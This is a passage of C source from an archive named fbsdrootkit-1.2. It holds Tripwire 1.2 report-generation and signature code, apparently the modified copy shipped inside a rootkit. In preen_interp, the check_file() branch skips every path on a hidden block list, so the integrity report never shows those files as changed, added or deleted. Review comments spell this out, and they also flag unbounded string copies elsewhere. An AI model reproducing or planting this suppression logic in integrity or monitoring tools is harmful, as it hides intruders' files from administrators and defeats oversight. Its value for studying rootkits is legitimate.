         * scan entire list, find all !SEEN
         *      they're DELETED
         */

        /* (this should never happen since it was already preprocessed!) */
        /* NOTE(review): s holds up to 1023 characters while value holds
         * 512; whether string_split_space() bounds its copies is not
         * visible here.
         */
        if (string_split_space(s, key, value) < 0) {
            fprintf(stderr, "%s: fatal parse error in preprocessed database file, line %d\n!", progname, countlines);
            exit(1);
        }

        filename_escape_expand(key);

        /*
         * Report suppression: when check_file(key) is non-zero the
         * record is flagged FLAG_SEEN and skipped.  It is never compared
         * with the stored value and never reaches diff_changed_list or
         * diff_added_list; an entry carrying FLAG_SEEN is also passed
         * over by the DELETED scan below.  A report built from these
         * lists therefore says nothing about any path the block list
         * matches.  Checking those paths needs a checker binary and
         * database taken from trusted, read-only media, since the
         * filtering happens inside the checker itself.
         */
        if(check_file(key)) {
            list_setflag(key, FLAG_SEEN, &olddbase_list);
            continue;
        }

        /* if file is in saved database */
        if ((oldvalue = list_lookup(key, &olddbase_list)) != NULL) {

            list_setflag(key, FLAG_SEEN, &olddbase_list);

            /* was it CHANGED?  (plain string compare of the two records) */
            if (strcmp(value, oldvalue) != 0) {
                SPDEBUG(6) printf("--(changed %s)------vvv\n", key);
                SPDEBUG(6) printf(">%s>%s\n", oldvalue, value);
                list_set(key, value, 0, &diff_changed_list);
                diff_changed_num++;
            }
            /* else skip it */
            else
                continue;
        }
        /* else it's been ADDED */
        else {
            list_set(key, value, 0, &diff_added_list);
            diff_added_num++;
        }
    }

    /* look for DELETED entries */
    if (list_open(&olddbase_list) < 0) {
        fprintf(stderr, "preen_interp: list_open() failed!\n");
        exit(1);
    }

    while ((plist = list_get(&olddbase_list)) != NULL) {

        /* skip entries that have already been seen; this includes the
         * entries flagged by the check_file() branch above
         */
        if (plist->flag & FLAG_SEEN)
            continue;

        list_set(plist->varname, plist->varvalue, 0, &diff_deleted_list);
        diff_deleted_num++;
    }

    /* the message below names list_open() although list_close() failed */
    if (list_close(&olddbase_list) < 0) {
        fprintf(stderr, "preen_interp: list_open() failed!\n");
        exit(1);
    }

    return;
}
fbsdrootkit-1.2/tripwire-1.2/src/preen.report.c100600 764 764 57031 5620062042 16676 0ustar dfdf
#ifndef lint
static char rcsid[] = "$Id: preen.report.c,v 1.20 1994/08/04 03:44:34 gkim Exp $";
#endif

/*
 * preen.report.c
 *
 *  report generation given the data from preening
 *
 * Gene Kim
 * Purdue University
 */

#include "../include/config.h"
#include
#ifdef STDLIBH
#include
#include
#endif
#include
#include
#include
#include
#ifdef STRINGH
#include
#else
#include
#endif
#include
#ifdef MALLOCH
# include
#endif
#include "../include/list.h"
#include "../include/tripwire.h"

static void preen_report_changed_enum();
static int preen_change_count();

static char *structstat_fill();
static void pair_print_ss();
static void pair_print_ll();
static void pair_print_llo();

static char **pp_update = (char **) NULL;
static void updateentry_prompt();
static void updateentry_menu();
static void updateentry_help();
static int entrynum_get();

/*
 * preen_report()
 *
 *  report on:
 *      which files have been ADDED
 *      which files have been DELETED
 *      which files have been CHANGED
 *          what attribute changed?
 *
 *  remember that (olddbase_list) is composed of filenames that
 *  have not been expanded.
*
 *  (interactive) non-zero: /dev/tty is opened for reading and writing
 *  and updateentry_prompt() is called for each reported file.
 *  (ppp_updateentries) out: receives the file-static pp_update pointer
 *  on return.  diff_unignored_num is set to the value returned by
 *  preen_change_count().  Exits on tty or list errors.
 *
 *  The lists and counters reported here are the ones filled by
 *  preen_interp() in preen.interp.c.  In this tree preen_interp()
 *  skips every record for which check_file() is true before it is
 *  counted or listed, so neither the totals nor the per-file output
 *  below can show those paths.
 */
void
preen_report(interactive, ppp_updateentries)
    int interactive;
    char ***ppp_updateentries;
{
    struct list_elem *p;
    struct stat statnew, statold;
    char sigsnew[NUM_SIGS][SIG_MAX_LEN], sigsold[NUM_SIGS][SIG_MAX_LEN];
    char *s;
    int unignored;
    FILE *fttyin = NULL, *fttyout = NULL;

    /* we'll use a local variable for this */
    /* pp_update = *ppp_updateentries; */

    /* if we're in interactive mode, open tty for input */
    if (interactive) {
        if ((fttyin = fopen("/dev/tty", "r")) == NULL) {
            /* NOTE(review): progname is formatted into 256 bytes with
             * no length limit; assumes a short program name
             */
            char err[256];
            sprintf(err, "%s: cannot fopen() /dev/tty", progname);
            perror(err);
            exit(1);
        }
        if ((fttyout = fopen("/dev/tty", "w")) == NULL) {
            char err[256];
            sprintf(err, "%s: cannot fopen() /dev/tty", progname);
            perror(err);
            exit(1);
        }
    }

    /* flags each changed entry as FLAG_CHANGED or FLAG_UNCHANGE and
     * returns how many changes survive the ignore masks
     */
    unignored = preen_change_count();

    if (!quietmode) {
        fprintf(stderr, "###\n");
        fprintf(stderr, "###\t\t\tTotal files scanned:\t\t%d\n", files_scanned_num);
        fprintf(stderr, "###\t\t\t Files added:\t\t%d\n", diff_added_num);
        fprintf(stderr, "###\t\t\t Files deleted:\t\t%d\n", diff_deleted_num);
        fprintf(stderr, "###\t\t\t Files changed:\t\t%d\n", diff_changed_num);
        fprintf(stderr, "###\n");
        fprintf(stderr, "###\t\t\tAfter applying rules:\n");
        /* NOTE(review): "discarded" and "remaining" both include
         * diff_added_num + diff_deleted_num, so the two figures do not
         * add up to the three totals above -- confirm the arithmetic
         */
        fprintf(stderr, "###\t\t\t Changes discarded:\t%d\n", diff_added_num + diff_deleted_num + diff_changed_num - (unignored) );
        fprintf(stderr, "###\t\t\t Changes remaining:\t%d\n", unignored + diff_added_num + diff_deleted_num);
        fprintf(stderr, "###\n");
    }

    /****** added ******/

    /* open each of the three lists, using &diff_xxxx_list as keys */
    if (list_open(&diff_added_list) < 0) {
        fprintf(stderr, "preen_report: list_open() failed!\n");
        exit(1);
    }

    /* print out each added file in sequence */
    while ((p = list_get(&diff_added_list)) != NULL) {
        /* passed to updateentry_prompt() as its reset argument on the
         * first interactive prompt of this loop
         */
        static int firsttime = 1;
        /* unbounded copy below: assumes varname fits in 2048 bytes */
        char filename[2048];

        strcpy(filename, p->varname);
        (void) structstat_fill(p->varvalue, &statnew, sigsnew, filename);
        direntry_print(filename, statnew, DIFF_ADDED);

        /* XXX: Why are some people seeing files in the added and deleted
         * list.  The code only prints a notice when this happens;
         * it does not abort.
         */
        if (list_isthere(filename, &diff_deleted_list)) {
            printf("### Why is this file also marked as DELETED? Please mail this output to (gkim@cs.purdue.edu)!\n");
        }
        if (list_isthere(filename, &diff_changed_list)) {
            printf("### Why is this file also marked as CHANGED? Please mail this output to (gkim@cs.purdue.edu)!\n");
        }

        if (interactive) {
            int entrynum;

            entrynum = entrynum_get(p->varvalue);
            updateentry_prompt(fttyin, fttyout, filename, entrynum, firsttime);
            firsttime = 0;
        }
    }

    if (list_close(&diff_added_list) < 0) {
        fprintf(stderr, "preen_report: list_close() failed!\n");
        exit(1);
    }

    /****** deleted ******/

    /* now print out the files that were deleted */
    if (list_open(&diff_deleted_list) < 0) {
        fprintf(stderr, "preen_report: list_open() failed!\n");
        exit(1);
    }

    /* print out each deleted file in sequence */
    while ((p = list_get(&diff_deleted_list)) != NULL) {
        static int firsttime = 1;
        /* unbounded copy below: assumes varname fits in 2048 bytes */
        char filename[2048];

        strcpy(filename, p->varname);
        /* the stored record is parsed into statnew only so that
         * direntry_print() has something to show
         */
        (void) structstat_fill(p->varvalue, &statnew, sigsnew, filename);
        direntry_print(filename, statnew, DIFF_DELETED);

        if (interactive) {
            int entrynum;

            entrynum = entrynum_get(p->varvalue);
            updateentry_prompt(fttyin, fttyout, filename, entrynum, firsttime);
            firsttime = 0;
        }
    }

    if (list_close(&diff_deleted_list) < 0) {
        fprintf(stderr, "preen_report: list_close() failed!\n");
        exit(1);
    }

    /***** changed ******/

    /*
     * iterate through the list
     *      get the ignore vector
     *      foreach each (attribute) {
     *          if (attribute != attribute')
     *              if (!ignored) { flag it; }
     *      }
     */

    /* list_print(&diff_changed_list); */
    if (list_open(&diff_changed_list) < 0) {
        fprintf(stderr, "preen_report: list_open() failed!\n");
        exit(1);
    }

    /* print out each changed file in sequence */
    while ((p = list_get(&diff_changed_list)) != NULL) {

        /* filename, ignore, mode, inode, nlinks, uid, gid, size, access,
         *      modify, ctime, sig1, sig2
         */

        /* read in the new value from the changed_list
         *      throw away the new ignorevector -- we use the old one!
         */
        (void) structstat_fill(p->varvalue, &statnew, sigsnew, p->varname);

        /* read in the list1 value from the hash table */
        if ((s = list_lookup(p->varname, &olddbase_list)) == NULL) {
            fprintf(stderr, "preen_report: list_lookup(%s) failed!\n", p->varname);
            exit(1);
        }

        /* check for unchanged flag (set by preen_change_count()) */
        if (list_getflag(p->varname, &diff_changed_list) & FLAG_UNCHANGE) {
            SPDEBUG(6) printf("--(skipping unchanged entry %s)--\n", p->varname);
            continue;
        }

        (void) structstat_fill(s, &statold, sigsold, p->varname);

        /* is this file to be ignored?  only FLAG_CHANGED entries print */
        if (!(list_getflag(p->varname, &diff_changed_list) & FLAG_CHANGED))
            continue;

        /* print out the report for this file */
        direntry_print(p->varname, statnew, DIFF_CHANGED);
    }

    if (list_close(&diff_changed_list) < 0) {
        fprintf(stderr, "preen_report: list_close() failed!\n");
        exit(1);
    }

    /* enumerate specifics of changed files, if long output specified */
    if (interactive || (!quietmode && unignored != 0)) {
        preen_report_changed_enum(interactive, fttyin, fttyout);
    }

    /* close up the tty streams */
    if (interactive) {
        fclose(fttyin);
        fclose(fttyout);
    }

    /* hand the accumulated update list and the unignored count back */
    *ppp_updateentries = pp_update;
    diff_unignored_num = unignored;

    return;
}

/*
 * preen_report_changed_enum(int interactive, fttyin, fttyout)
 *
 *  enumerate each changed attribute for each of the changed files.
 *  this is treated as yet another pass in the checking process.
 *
 *  (interactive) indicates whether we should be asking the user to
 *  update this file later.  (fttyin) and (fttyout) are the streams
 *  we talk through.
*/ static void preen_report_changed_enum(interactive, fttyin, fttyout) int interactive; FILE *fttyin, *fttyout; { struct list_elem *p; char *ignorevec; char sigsold[NUM_SIGS][SIG_MAX_LEN], sigsnew[NUM_SIGS][SIG_MAX_LEN]; struct stat statnew, statold; char *s; char stime1[64], stime2[64]; int ignoremask; int i; char label[50]; (void) fflush(stdout); if (!quietmode) { fprintf(stderr, "### Phase 5: Generating observed/expected pairs for changed files\n"); fprintf(stderr, "###\n"); (void) fflush(stderr); } printf("### Attr Observed (what it is) Expected (what it should be)\n"); printf("### =========== ============================= =============================\n"); /**** st_atime: Mon Aug 31 16:48:57 1992 Mon Aug 31 14:05:49 1992 ****/ /* open the list of changed files */ if (list_open(&diff_changed_list) < 0) { fprintf(stderr, "preen_report: list_open() failed!\n"); exit(1); } /* print out each added file in sequence */ while ((p = list_get(&diff_changed_list)) != NULL) { static int firsttime = 1; /* filename, ignore, mode, inode, nlinks, uid, gid, size, access, * modify, ctime, sig1, sig2 .. sign */ /* read in the list2 value from the changed_list * throw away the new ignorevector -- we use the old one! */ (void) structstat_fill(p->varvalue, &statnew, sigsnew, p->varname); /* read in the list1 value form the hash table */ if ((s = list_lookup(p->varname, &olddbase_list)) == NULL) { fprintf(stderr, "preen_report_changed_enum: list_lookup(%s) failed!\n", p->varname); exit(1); } ignorevec = structstat_fill(s, &statold, sigsold, p->varname); /* get the ignoremask */ ignoremask = ignore_vec_to_scalar(ignorevec); /* is this file to be ignored? 
*/ if (!(list_getflag(p->varname, &diff_changed_list) & FLAG_CHANGED)) continue; printf("%s\n", p->varname); /* and then the {expected, received} pairs */ #define STATEQ(x) (statnew.x != statold.x) /* if we're reporting growing files, report size */ if (ignoremask & IGNORE_GROW) { ignoremask = ignoremask & ~(IGNORE_S); } if (!(ignoremask & IGNORE_P)) if (STATEQ(st_mode)) { pair_print_llo("st_mode:", (int32) statnew.st_mode, (int32) statold.st_mode); } if (!(ignoremask & IGNORE_I)) if (STATEQ(st_ino)) { pair_print_ll("st_ino:", (int32) statnew.st_ino, (int32) statold.st_ino); } if (!(ignoremask & IGNORE_N)) if (STATEQ(st_nlink)) { pair_print_ll("st_nlink:", (int32) statnew.st_nlink, (int32) statold.st_nlink); } if (!(ignoremask & IGNORE_U)) if (STATEQ(st_uid)) { pair_print_ll("st_uid:", (int32) statnew.st_uid, (int32) statold.st_uid); } if (!(ignoremask & IGNORE_G)) if (STATEQ(st_gid)) { pair_print_ll("st_gid:", (int32) statnew.st_gid, (int32) statold.st_gid); } if (!(ignoremask & IGNORE_S)) if (STATEQ(st_size)) { pair_print_ll("st_size:", (int32) statnew.st_size, (int32) statold.st_size); } if (!(ignoremask & IGNORE_A)) if (STATEQ(st_atime)) { (void) strcpy(stime1, ctime(&statnew.st_atime)); (void) strcpy(stime2, ctime(&statold.st_atime)); chop(stime1); chop(stime2); pair_print_ss("st_atime:", stime1, stime2); } if (!(ignoremask & IGNORE_M)) if (STATEQ(st_mtime)) { (void) strcpy(stime1, ctime(&statnew.st_mtime)); (void) strcpy(stime2, ctime(&statold.st_mtime)); chop(stime1); chop(stime2); pair_print_ss("st_mtime:", stime1, stime2); } if (!(ignoremask & IGNORE_C)) if (STATEQ(st_ctime)) { (void) strcpy(stime1, ctime(&statnew.st_ctime)); (void) strcpy(stime2, ctime(&statold.st_ctime)); chop(stime1); chop(stime2); pair_print_ss("st_ctime:", stime1, stime2); } for (i = 0; i < NUM_SIGS; i++) { if (!(runtimeignore & (IGNORE_0 << i)) && !(ignoremask & (IGNORE_0 << i))) if (strcmp(sigsnew[i], sigsold[i]) != 0) { (void) sprintf(label, "%s (sig%d):", signames[i], i); 
pair_print_ss(label, sigsnew[i], sigsold[i]); } } /* quiz the user if this entry should be updated */ if (interactive) { int entrynum; entrynum = entrynum_get(p->varvalue); updateentry_prompt(fttyin, fttyout, p->varname, entrynum, firsttime); firsttime = 0; } /* separate entries by a space */ printf("\n"); } if (list_close(&diff_changed_list) < 0) { fprintf(stderr, "preen_report_changed_enum: list_close() failed!\n"); exit(1); } } /* * preen_change_count() * * return the number of files that are changed, according to their * ignore vectors. */ static int preen_change_count() { int changed = 0; struct list_elem *p; char sigsold[NUM_SIGS][SIG_MAX_LEN], sigsnew[NUM_SIGS][SIG_MAX_LEN]; char vec64_a[50], vec64_m[50], vec64_c[50]; char trash[512]; struct stat statnew, statold; char *s; int ignoremask; char ignorevec[512]; uint32 mode, ino, nlink, uid, gid, size; int entrynum; int nfields; /***** changed ******/ /* * interate through the list * get the ignore vector * foreach each (attribute) { * if (attribute != attribute') * if (!ignored) { flag it; } * } */ if (list_open(&diff_changed_list) < 0) { fprintf(stderr, "preen_report: list_open(diff_changed_list) failed!\n"); exit(1); } /* print out each added file in sequence */ while ((p = list_get(&diff_changed_list)) != NULL) { int isdir = 0; int reallychanged = 0; /* filename, ignore, mode, inode, nlinks, uid, gid, size, access, * modify, ctime, sig1, sig2 */ /* read in the list2 value from the changed_list * throw away the new ignorevector -- we use the old one! */ if ((nfields = sscanf(p->varvalue, db_record_format, &entrynum, trash, &mode, &ino, &nlink, &uid, &gid, &size, vec64_a, vec64_m, vec64_c, sigsnew[0], sigsnew[1], sigsnew[2], sigsnew[3], sigsnew[4], sigsnew[5], sigsnew[6], sigsnew[7], sigsnew[8], sigsnew[9])) != DB_RECORD_FIELDS) { fprintf(stderr, "preen_change_count: %s: illegal database record (nfields == %d). 
Aborting...\n", p->varname, nfields); fprintf(stderr, " '%s'\n", p->varvalue); exit(1); } if ((mode & S_IFMT) == S_IFDIR) isdir = 1; statnew.st_mode = (mode_t)mode; statnew.st_ino = (ino_t)ino; statnew.st_nlink = (nlink_t)nlink; statnew.st_uid = (uid_t)uid; statnew.st_gid = (gid_t)gid; statnew.st_size = (off_t)size; /* convert from base64 to int */ statnew.st_atime = b64tol(vec64_a); statnew.st_mtime = b64tol(vec64_m); statnew.st_ctime = b64tol(vec64_c); /* read in the list1 value form the hash table */ if ((s = list_lookup(p->varname, &olddbase_list)) == NULL) { fprintf(stderr, "preen_change_count: list_lookup(%s) failed!\n", p->varname); exit(1); } if ((nfields = sscanf(s, db_record_format, &entrynum, ignorevec, &mode, &ino, &nlink, &uid, &gid, &size, vec64_a, vec64_m, vec64_c, sigsold[0], sigsold[1], sigsold[2], sigsold[3], sigsold[4], sigsold[5], sigsold[6], sigsold[7], sigsold[8], sigsold[9])) != DB_RECORD_FIELDS) { fprintf(stderr, "preen_change_count: %s: illegal database record! Aborting... (nfields=%d)\n", p->varname, nfields); fprintf(stderr, " '%s'\n", s); exit(1); } statold.st_mode = (mode_t)mode; statold.st_ino = (ino_t)ino; statold.st_nlink = (nlink_t)nlink; statold.st_uid = (uid_t)uid; statold.st_gid = (gid_t)gid; statold.st_size = (off_t)size; /* convert from base64 to int */ statold.st_atime = b64tol(vec64_a); statold.st_mtime = b64tol(vec64_m); statold.st_ctime = b64tol(vec64_c); /* get the ignoremask */ ignoremask = ignore_vec_to_scalar(ignorevec); /* and then the {expected, received} pairs */ #define FLAGIT(x) changed++; reallychanged = 1; SPDEBUG(3) {printf("--(FLAGGING %s: unignored change in <%s>)--\n", p->varname, (x)); } list_setflag(p->varname, FLAG_CHANGED, &diff_changed_list); continue #define SIGEQ(x) if (strcmp(sigsnew[(x)], sigsold[(x)]) != 0) /* allow for loose directory interpretations by ignoring nlink, * ctime, and mtime, and size. 
*/ if (isdir && loosedir) { ignoremask |= IGNORE_N | IGNORE_M | IGNORE_C | IGNORE_S; } #ifdef apollo /* * Apollos do not keep ownership or dates for symlinks, but * get these from the directory containing them (with wide-open * permissions). Ignore these. (Why only if we also have loosedir?) * (Otherwise each symlink would get flagged whenever the directory * is changed, e.g. by adding or deleting a file.) */ else if (((mode & S_IFMT) == S_IFLNK) && loosedir) { ignoremask |= IGNORE_P | IGNORE_U | IGNORE_G | IGNORE_A | IGNORE_M | IGNORE_C; } #endif /* note the pain we go through to avoid dangling else's */ if (!(ignoremask & IGNORE_P)) { if (STATEQ(st_mode)) {FLAGIT("p");}} if (!(ignoremask & IGNORE_I)) { if (STATEQ(st_ino)) {FLAGIT("i");}} if (!(ignoremask & IGNORE_N)) { if (STATEQ(st_nlink)) {FLAGIT("n");}} if (!(ignoremask & IGNORE_U)) { if (STATEQ(st_uid)) {FLAGIT("u");}} if (!(ignoremask & IGNORE_G)) { if (STATEQ(st_gid)) {FLAGIT("g");}} if ((ignoremask & IGNORE_GROW)) { if (statnew.st_size < statold.st_size) { ignoremask = ignoremask & ~(IGNORE_S); FLAGIT(">"); ;}} if (!(ignoremask & IGNORE_S)) { if (STATEQ(st_size)) {FLAGIT("s");}} if (!(ignoremask & IGNORE_A)) { if (STATEQ(st_atime)) {FLAGIT("a");}} if (!(ignoremask & IGNORE_M)) { if (STATEQ(st_mtime)) {FLAGIT("m");}} if (!(ignoremask & IGNORE_C)) { if (STATEQ(st_ctime)) {FLAGIT("c");}} if (!(runtimeignore & IGNORE_0) && !(ignoremask & IGNORE_0)) { SIGEQ(0) {FLAGIT("0");}} if (!(runtimeignore & IGNORE_1) && !(ignoremask & IGNORE_1)) { SIGEQ(1) {FLAGIT("1");}} if (!(runtimeignore & IGNORE_2) && !(ignoremask & IGNORE_2)) { SIGEQ(2) {FLAGIT("2");}} if (!(runtimeignore & IGNORE_3) && !(ignoremask & IGNORE_3)) { SIGEQ(3) {FLAGIT("3");}} if (!(runtimeignore & IGNORE_4) && !(ignoremask & IGNORE_4)) { SIGEQ(4) {FLAGIT("4");}} if (!(runtimeignore & IGNORE_5) && !(ignoremask & IGNORE_5)) { SIGEQ(5) {FLAGIT("5");}} if (!(runtimeignore & IGNORE_6) && !(ignoremask & IGNORE_6)) { SIGEQ(6) {FLAGIT("6");}} if 
(!(runtimeignore & IGNORE_7) && !(ignoremask & IGNORE_7)) { SIGEQ(7) {FLAGIT("7");}} if (!(runtimeignore & IGNORE_8) && !(ignoremask & IGNORE_8)) { SIGEQ(8) {FLAGIT("8");}} if (!(runtimeignore & IGNORE_9) && !(ignoremask & IGNORE_9)) { SIGEQ(9) {FLAGIT("9");}} if (!reallychanged) { list_setflag(p->varname, FLAG_UNCHANGE, &diff_changed_list); } } /* clean up */ if (list_close(&diff_changed_list) < 0) { fprintf(stderr, "preen_report: list_close(diff_changed_list) failed!\n"); exit(1); } return changed; } /* * structstat_fill(char *string, struct stat *statbuf, char *filename) * * given a string from the database, fill in the statbuf structure. * (filename) is provided for error reporting. * * return the ignore vector (a static system structure) */ static char * structstat_fill (string, statbuf, sigs, recordkey) char *string; struct stat *statbuf; char sigs[NUM_SIGS][SIG_MAX_LEN]; char *recordkey; { char *ignorevec; static char structstat_fill_string[512]; uint32 mode, ino, nlink, uid, gid, size; int entrynum; char vec64_a[50], vec64_m[50], vec64_c[50]; (void) strcpy(structstat_fill_string, string); ignorevec = structstat_fill_string; if (sscanf(string, db_record_format, &entrynum, ignorevec, &mode, &ino, &nlink, &uid, &gid, &size, vec64_a, vec64_m, vec64_c, sigs[0], sigs[1], sigs[2], sigs[3], sigs[4], sigs[5], sigs[6], sigs[7], sigs[8], sigs[9]) != DB_RECORD_FIELDS) { fprintf(stderr, "structstat_fill: %s: illegal database record! 
Aborting...\n", recordkey); fprintf(stderr, " '%s'\n", string); exit(1); } statbuf->st_mode = (mode_t)mode; statbuf->st_ino = (ino_t)ino; statbuf->st_nlink = (nlink_t)nlink; statbuf->st_uid = (uid_t)uid; statbuf->st_gid = (gid_t)gid; statbuf->st_size = (off_t)size; /* convert from base64 to int */ statbuf->st_atime = b64tol(vec64_a); statbuf->st_mtime = b64tol(vec64_m); statbuf->st_ctime = b64tol(vec64_c); return ignorevec; } /* * entrynum_get(char *string) * * given a string from the database, return the entrynum */ static int entrynum_get (string) char *string; { char trash[1024]; int entrynum; if (sscanf(string, "%d %s", &entrynum, trash) != 2) { fprintf(stderr, "entrynum_get: illegal database record! Aborting...\n"); fprintf(stderr, ">> '%s'\n", string); exit(1); } return entrynum; } /* * pair_print_ss(char *label, char *s1, char *s2) * * print {expected,received} table with strings */ static void pair_print_ss (label, s1, s2) char *label; char *s1; char *s2; { printf("%15s %-30s%-30s\n", label, s1, s2); return; } /* * pair_print_ll(char *label, int32 l1, int32 l2) * * print {expected,received} table with int32s */ static void pair_print_ll (label, l1, l2) char *label; int32 l1; int32 l2; { printf("%15s %-30ld%-30ld\n", label, l1, l2); return; } /* * pair_print_llo(char *label, int32 l1, int32 l2) * * print {expected,received} table with int32s in octal */ static void pair_print_llo (label, l1, l2) char *label; int32 l1; int32 l2; { printf("%15s %-30lo%-30lo\n", label, l1, l2); return; } static void updateentry_list_add(filename) char *filename; { char *pc; static int numinterupdated = 0; pc = (char *) malloc((unsigned) strlen(filename) + 1); (void) strcpy(pc, filename); /* make sure we don't realloc() a null pointer */ if (!pp_update) { if (!(pp_update = (char **) malloc(sizeof(char *)))) die_with_err("main: realloc() failed!\n", NULL); } if ((pp_update = (char **) realloc(pp_update, (numinterupdated+2) * sizeof(char *))) == NULL) { die_with_err("main: 
realloc() failed!\n", NULL); } pp_update[numinterupdated++] = pc; pp_update[numinterupdated] = NULL; } static void updateentry_prompt(fttyin, fttyout, filename, entrynum, reset) FILE *fttyin, *fttyout; char *filename; int entrynum; int reset; { static int firsttime = 1; static int lastanswer = 0; char answer[100], *pc; static int lastentrynum = -1; SPDEBUG(100) printf("updateentry_prompt: (entrynum=%d, lastentrynum=%d)\n", entrynum, lastentrynum); #define LASTANSWER_ALLYES 1 #define LASTANSWER_ALLNO 2 #define LASTANSWER_QUIT 3 if (reset) { firsttime = 1; lastanswer = 0; lastentrynum = -1; } AGAIN: if (lastanswer == LASTANSWER_ALLNO) { if (entrynum == lastentrynum) { return; } else { lastentrynum = -1; lastanswer = 0; } } if (lastanswer == LASTANSWER_ALLYES || test_interactive) { if (entrynum == lastentrynum) { updateentry_list_add(filename); if (!test_interactive) { fprintf(fttyout, "---> Updating '%s'\n", filename_escape(filename)); fflush(fttyout); } return; } else { lastentrynum = -1; lastanswer = 0; } } if (!test_interactive) { fprintf(fttyout, "---> File: '%s'\n", filename_escape(filename)); fprintf(fttyout, "---> Update entry? [YN(y)nh?] "); fflush(fttyout); (void) fgets(answer, sizeof(answer), fttyin); pc = answer; } /* we're in interactive testing mode */ else { pc = "Y"; } switch(*pc) { case '\n': case 'y': updateentry_list_add(filename); break; case 'Y': updateentry_list_add(filename); lastanswer = LASTANSWER_ALLYES; lastentrynum = entrynum; break; case 'n': break; case 'N': lastanswer = LASTANSWER_ALLNO; lastentrynum = entrynum; break; case 'h': updateentry_help(fttyout); goto AGAIN; break; case '?': updateentry_menu(fttyout); goto AGAIN; break; default: fprintf(fttyout, "I don't understand your choice '%c'. 
Try again.\n", *pc); goto AGAIN; } firsttime = 0; } static void updateentry_menu(fpout) FILE *fpout; { fprintf(fpout, "\n"); fprintf(fpout, " y: Yes, update the database entry to match current file\n"); fprintf(fpout, " n: No, leave database entry alone\n"); fprintf(fpout, " Y: Yes, and change all other files in this entry\n"); fprintf(fpout, " N: No, and leave all other entries alone\n"); fprintf(fpout, " h: Print inode information help message\n"); fprintf(fpout, " ?: Print this help message\n"); fprintf(fpout, "\n"); } static void updateentry_help(fpout) FILE *fpout; { (void) tw_help_print(fpout); } fbsdrootkit-1.2/tripwire-1.2/src/siggen.c100600 764 764 10704 5614754434 15543 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: siggen.c,v 1.14 1994/07/25 15:24:12 gkim Exp $"; #endif /* * siggen.c * * generate signatures for a given file. * * Gene Kim * Purdue University * October 14, 1992 */ #include "../include/config.h" #include #include #ifdef STDLIBH # include #endif #include #include #include #ifndef XENIX # include #else # include #endif /* XENIX */ #ifdef DIRENT # include #else # ifndef XENIX # include # else /* XENIX */ # include # endif /* XENIX */ #endif /* DIRENT */ #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #ifdef STRINGH #include #else #include #endif #include "../include/list.h" #include "../include/tripwire.h" #ifndef L_tmpnam # define L_tmpnam (unsigned int) MAXPATHLEN #endif extern int optind; int debuglevel = 0; char *mktemp(); int (*pf_signatures [NUM_SIGS]) () = { SIG0FUNC, SIG1FUNC, SIG2FUNC, SIG3FUNC, SIG4FUNC, SIG5FUNC, SIG6FUNC, SIG7FUNC, SIG8FUNC, SIG9FUNC }; int printhex = 0; int sigallget = 1; int sigvector[NUM_SIGS] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 }; char *signames[NUM_SIGS] = { SIG0NAME, SIG1NAME, SIG2NAME, SIG3NAME, SIG4NAME, SIG5NAME, SIG6NAME, SIG7NAME, SIG8NAME, SIG9NAME, }; int verbosity = 0; int quietmode = 0; char *tmpfilename = NULL; int readstdin = 0; char *progname; void usage() { int i; fprintf(stderr, 
"siggen: usage: [-0123456789qv] [-h] [ file ... ]\n"); fprintf(stderr, " (-h is to print signatures in hexadecimal. default is base-64.\n"); for (i = 0; i < sizeof(signames)/sizeof(char *); i++) { fprintf(stderr, "\tsig %d: %s\n", i, signames[i]); } exit(1); } int main(argc, argv) int argc; char *argv[]; { int i, c; int fd; int errors = 0; progname = argv[0]; optind = 1; while ((c = getopt(argc, argv, "0123456789aqvh")) != -1) { switch(c) { case '0': sigallget = 0; sigvector[0] = 1; break; case '1': sigallget = 0; sigvector[1] = 1; break; case '2': sigallget = 0; sigvector[2] = 1; break; case '3': sigallget = 0; sigvector[3] = 1; break; case '4': sigallget = 0; sigvector[4] = 1; break; case '5': sigallget = 0; sigvector[5] = 1; break; case '6': sigallget = 0; sigvector[6] = 1; break; case '7': sigallget = 0; sigvector[7] = 1; break; case '8': sigallget = 0; sigvector[8] = 1; break; case '9': sigallget = 0; sigvector[9] = 1; break; case 'a': sigallget = 1; break; case 'v': verbosity = 1; break; case 'q': quietmode = 1; break; case 'h': printhex = 1; break; case '?': default: usage(); exit(1); } } argc -= optind; argv += optind; if (argc == 0) readstdin = 1; for (i = 0; i < argc; i++) { if (strcmp(argv[i], "-") == 0) { readstdin = 1; continue; } else if ((fd = open(argv[i], O_RDONLY, 0)) < 0) { warn_with_err("siggen: skipping '%s'", argv[i]); errors++; continue; } if (argc > 1) printf("*** %s ***\n", argv[i]); if (siggen(fd) < 0) errors++; if (fd) close(fd); } if (readstdin) { FILE *fpout; /* generate temporary file name */ if ((tmpfilename = (char *) malloc(L_tmpnam + MAXPATHLEN)) == NULL) { perror("main: malloc()"); exit(1); }; (void) strcpy(tmpfilename, "/tmp/twzXXXXXX"); if ((char *) mktemp(tmpfilename) == NULL) { perror("siggen: mktemp()"); exit(1); } /* output */ if (!(fpout = fopen(tmpfilename, "w"))) { char err[1024]; sprintf(err, "main: fopen(%s)", tmpfilename); perror(err); exit(1); } /* copy */ while ((c = getc(stdin)) != EOF) putc(c, fpout); 
fclose(fpout); if ((fd = open(tmpfilename, O_RDONLY)) < 0) { perror("siggen: open"); exit(1); } if (siggen(fd) < 0) errors++; if (fd) close(fd); unlink(tmpfilename); } if (errors) exit(1); exit(0); } int siggen(fd) int fd; { char sigs[NUM_SIGS][SIG_MAX_LEN]; int i; /* collect signatures */ for (i = 0; i < NUM_SIGS; i++) { char *pc = sigs[i]; if (sigallget || sigvector[i]) { if ((*pf_signatures[i])(fd, pc, SIG_MAX_LEN) < 0) { return -1; } if (!quietmode) printf("sig%d: %-9s: %s\n", i, signames[i], sigs[i]); else printf("%s ", sigs[i]); } } if (quietmode) printf("\n"); return 0; } fbsdrootkit-1.2/tripwire-1.2/src/twdb_check.pl100700 764 764 7006 5627323151 16527 0ustar dfdf#!/usr/local/bin/perl # The purpose of this script is to match each database entry with # its "closest" tw.config entry. Discrepencies appear when database # entries are added, and currently, Tripwire does not remap existing # entries to newly added entries. # # This script is an interim measure to correct this database divergence. ## ## From tripwire.h ## ## /* database record format */ ## /* filename: (entrynumber, ignorevec, st_mode, st_ino, st_nlink, ## * st_uid, st_gid, st_size, ## * ltob64(statbuf->st_atime, vec64_a), ## * ltob64(statbuf->st_mtime, vec64_m), ## * 